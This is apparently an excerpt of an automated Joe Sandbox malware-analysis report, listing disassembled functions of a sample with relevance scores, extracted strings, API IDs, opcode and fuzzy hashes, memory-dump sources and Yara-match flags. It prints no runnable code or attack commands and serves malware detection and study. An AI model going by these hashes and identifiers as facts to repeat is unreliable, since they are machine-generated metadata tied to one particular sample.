                                                                              • Opcode Fuzzy Hash: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                                              • Instruction Fuzzy Hash: D8900231206401429A4073585804A4F8105D7E2302B95D429A1015574CCA14CA755322
                                                                              Function 017E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: 282b390c799939476a8114c964645d9b8899f5fb88ab7cbf9e26f997ec0e196a
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 017E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                              • Instruction ID: 183cafce112d5492bc2b5a0425753c34ccb7e2db340e70736b005c1f0bda4649
                                                                              • Opcode Fuzzy Hash: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                              • Instruction Fuzzy Hash: B051E3B6A04156AECB15DBACC89497EFBFCBB0C240B148269F569E7646D374DE00C7A0
                                                                              Function 01852410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                              • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                                              • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                              • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                                              Function 017D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                                              • ExecuteOptions, xrefs: 018146A0
                                                                              • Execute=1, xrefs: 01814713
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                              • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                                              • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                              • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                                              Function 017EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                                              Function 018520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$[$]:%u
                                                                              • API String ID: 48624451-2819853543
                                                                              • Opcode ID: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                                              • Instruction ID: 5f8c094f46e201fff233735c4c5095c2ec6402a8c7d989dc82a29ca6ffb1e091
                                                                              • Opcode Fuzzy Hash: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                                              • Instruction Fuzzy Hash: 5421567AA00519ABDB50DE79DC449BFBBEAEF54744F040115ED05D3205EB30EA058B91
                                                                              Function 017CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                                              • RTL: Re-Waiting, xrefs: 0181031E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                              • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                                              • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                              • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                                              Function 017DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 01817B8E
                                                                              • RTL: Re-Waiting, xrefs: 01817BAC
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                              • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                                              • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                              • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                                              Function 017DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                                              Strings
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                                              • RTL: Resource at %p, xrefs: 018172A3
                                                                              • RTL: Re-Waiting, xrefs: 018172C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                              • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                                              • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                              • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                                              Function 01852300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$]:%u
                                                                              • API String ID: 48624451-3050659472
                                                                              • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                              • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                                              • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                              • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                                              Function 017E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                                              Function 017A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                              • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                                              • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                              • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0
                                                                              Function 0182CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0182CFBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8
                                                                              • String ID: @$@4rw@4rw
                                                                              • API String ID: 4062629308-2979693914
                                                                              • Opcode ID: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                              • Instruction ID: 084a9f5174b8fc094d1b162a9402e10e031d6a62d059cca4c1b5fed9c858603a
                                                                              • Opcode Fuzzy Hash: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                              • Instruction Fuzzy Hash: E941B271900229DFCB229FA9C884AAEFBF8FF54740F14412AE915DB264D774DA41CB61

                                                                              Executed Functions

                                                                              Function 034EA75D Relevance: .1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d06df44ac7f4c3781ce1493445eb21a1b3c70dccb32ce6bbe2769c813f57b5ac
                                                                              • Instruction ID: 135353451c21732b6e96ffaa34ec9c57edb05b3a4b5b6d5fdc16e8254a822740
                                                                              • Opcode Fuzzy Hash: d06df44ac7f4c3781ce1493445eb21a1b3c70dccb32ce6bbe2769c813f57b5ac
                                                                              • Instruction Fuzzy Hash: 7831A4116587F14ED30E836D08B9675AEC28E5B20174EC2EEDADA5F3E3C4888409D3A5
                                                                              Function 034E9D2A Relevance: 33.0, Strings: 26, Instructions: 473COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: J$ $"m$(O$*$$3c$<b$A$I-$Py$Tx$\;$]w$_$b$j$k$m$t.$wY$x2$za$8$;$;$V
                                                                              • API String ID: 0-4272605677
                                                                              • Opcode ID: 9d8d3cb34f24184f142f96bf0105d3ead50fb511c11b83b60a7138656e1476db
                                                                              • Instruction ID: fbc308a492da78bb88023125b86decb7226918e4d9cae27ef70797ec6a11a171
                                                                              • Opcode Fuzzy Hash: 9d8d3cb34f24184f142f96bf0105d3ead50fb511c11b83b60a7138656e1476db
                                                                              • Instruction Fuzzy Hash: 46428CB0D05268CBEB64CF45C898BDDBBB2BB45309F1085DAC55E7B280CBB55AC98F44
                                                                              Function 034F7B5A Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$O$S$\$s
                                                                              • API String ID: 0-3854637164
                                                                              • Opcode ID: 8e7d81f731b099927378a621b0ed022afee89c4086d5eae04d859a69e4457d9c
                                                                              • Instruction ID: 785409607038c4db920f85fa399f3b5bc1fdda2ceb2a836ee8e60abbb41bb94f
                                                                              • Opcode Fuzzy Hash: 8e7d81f731b099927378a621b0ed022afee89c4086d5eae04d859a69e4457d9c
                                                                              • Instruction Fuzzy Hash: 8651D572D00219AEDB14EF94DD88EFFF778EF84345F044299EE085B240E7755A488BA5
                                                                              Function 03504D6A Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >YZtP$>YZtP
                                                                              • API String ID: 0-3721418283
                                                                              • Opcode ID: 682a3ac950c724feed406ed87a0c7f418b235bfa9a2c715ed46b27c3ad916a36
                                                                              • Instruction ID: d44ae48c9d973713fa08c62ea6da8c0feacb5cff94033fe943e7ac7e76a975b1
                                                                              • Opcode Fuzzy Hash: 682a3ac950c724feed406ed87a0c7f418b235bfa9a2c715ed46b27c3ad916a36
                                                                              • Instruction Fuzzy Hash: E12121B6D0121CAF8B04DFA9D8409EFB7F9FF48210F14466AE915E7200E7709A018BE1
                                                                              Function 0350525A Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: n
                                                                              • API String ID: 0-2391717367
                                                                              • Opcode ID: dc193c621a2e1d1a96cfdf3eb2f61ac882b32c2d26499a62e56599bbcd6270c9
                                                                              • Instruction ID: 178c644135ef01fed66d0fb90e28bb7f4a7559f804a1b80e51be06f75c8319ba
                                                                              • Opcode Fuzzy Hash: dc193c621a2e1d1a96cfdf3eb2f61ac882b32c2d26499a62e56599bbcd6270c9
                                                                              • Instruction Fuzzy Hash: FC2130B6D01219AF8B04DFA9D8419EFB7F9FF88200F10466AE915E7240E7709A04CBE1
                                                                              Function 035060AA Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: C
                                                                              • API String ID: 0-3756324736
                                                                              • Opcode ID: 04c7f818f1937194e99df4efb491183e4e9414096e2ee5726e54c456acccd788
                                                                              • Instruction ID: 42dbebf8142a8f9f92ade5c2c5652bf650ac975f064e953b51ed95e7057bb63c
                                                                              • Opcode Fuzzy Hash: 04c7f818f1937194e99df4efb491183e4e9414096e2ee5726e54c456acccd788
                                                                              • Instruction Fuzzy Hash: F71100B6D0121CAFCB04DFA9D8419EEB7F9FF48210F14466EE915E7200E7705A048BA5
                                                                              Function 034E332A Relevance: .1, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2c75278540be466ddb070005211cd45b2ec137f02e9612312870860d5184fc53
                                                                              • Instruction ID: 65c9fbf975075b8fd5a6826c685d2fdb854f90f0a06c346aac2fa4ad0fe30213
                                                                              • Opcode Fuzzy Hash: 2c75278540be466ddb070005211cd45b2ec137f02e9612312870860d5184fc53
                                                                              • Instruction Fuzzy Hash: 7F41FEB1D11219AFDB04CF99D881EEEBBBCFF48710F10455AFA14EB240E7B196418BA4
                                                                              Function 03508A8A Relevance: .1, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                              • Instruction ID: 74fb299fdd213c65cca3138b12478812b72f0db001c1378d80a2f0e52db3808d
                                                                              • Opcode Fuzzy Hash: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                              • Instruction Fuzzy Hash: 7A31D7B5A00209AFCB14DF99D880EEE77B9FF8C300F008219F919A7394D770A851CBA5
                                                                              Function 03508BEA Relevance: .1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                              • Instruction ID: fadca6a652b934df67f0baea8343a5b0104c867bc8cbc5384344b8bb6d11f7a3
                                                                              • Opcode Fuzzy Hash: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                              • Instruction Fuzzy Hash: AD31EAB5A00209AFCB14DF99D840EEF77B9FF88300F008609F919AB394D771A911CBA5
                                                                              Function 035084BA Relevance: .1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 745e65acc50dac1d233e86ab654bd2478c29dc467a1109f92e4e10ba245b8501
                                                                              • Instruction ID: 1434d3e91c1a0f10b73c66779b508597026f3afa83a7763a2f8bce076eea3463
                                                                              • Opcode Fuzzy Hash: 745e65acc50dac1d233e86ab654bd2478c29dc467a1109f92e4e10ba245b8501
                                                                              • Instruction Fuzzy Hash: 05311AB5A00209AFDB14DF99D881EDF77B9FF88300F008509F919AB394D775A811CBA5
                                                                              Function 03508E1A Relevance: .1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7b002f33b811bf76ab3604ba18570f5855cffae0aab85011efdb0db773cc941a
                                                                              • Instruction ID: 9c27475abe0fe25b2057855f1fd21825158b4261865c279c6116a8d9dac2cdcd
                                                                              • Opcode Fuzzy Hash: 7b002f33b811bf76ab3604ba18570f5855cffae0aab85011efdb0db773cc941a
                                                                              • Instruction Fuzzy Hash: 362148B5A00309AFDB14DF98DC41EAFB7B9FF89300F008509F919AB284D771A911CBA5
                                                                              Function 034F799A Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abd9135dd75a5c6fbead0eed9d679405aee5bf8b7ca796632a873600f8a50986
                                                                              • Instruction ID: 645de4bc21b408d95569c4b42d296cb9efff32453bc72a14a2c497b419f5014b
                                                                              • Opcode Fuzzy Hash: abd9135dd75a5c6fbead0eed9d679405aee5bf8b7ca796632a873600f8a50986
                                                                              • Instruction Fuzzy Hash: 6B1191B67803067AF620DA159C42FAB776CABC4B50F244015FB08AE2C1D6A5B81146B8
                                                                              Function 035082CA Relevance: .1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3029b3eb1d5e1c6146e1287f09589e549d9b8dfe96ed68b47ec23a976ebe2a1b
                                                                              • Instruction ID: 49e90566605cbde271bd857e4ab7c46e88209dce397ba59926033ec1da11cf0d
                                                                              • Opcode Fuzzy Hash: 3029b3eb1d5e1c6146e1287f09589e549d9b8dfe96ed68b47ec23a976ebe2a1b
                                                                              • Instruction Fuzzy Hash: 2B119DB5A04319AFD710EB94DC41FAF73BDFB89300F008549FA196B280E772A911CBA5
                                                                              Function 0350814A Relevance: .1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8016e67c6e1c2fc9a5179110924fe79c0e53355a7c2c8bfa5bbbd3094af2250
